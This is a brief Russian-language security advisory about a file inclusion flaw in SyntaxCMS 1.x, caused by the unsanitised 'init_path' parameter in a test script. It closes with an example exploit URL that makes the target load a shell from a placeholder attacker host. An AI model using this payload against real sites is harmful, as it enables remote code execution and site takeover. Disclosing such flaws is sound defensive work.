Программа: SyntaxCMS 1.x
Обнаруженная уязвимость в SyntaxCMS может быть использована для подключения произвольных файлов с локальных и внешних ресурсов. Уязвимость возникает из-за того, что данные, передаваемые через параметр "init_path" не правильно обрабатываются в admin/testing/tests/0004_init_urls.php.
Для успешного эксплуатирования уязвимости требуется включение опций "register_globals" и "allow_fopen_url".
Пример:
http://www.poweredbysyntaxcmssite.com/admin/testing/ tests/0004_init_urls.php?init_path=http://YourShell?&
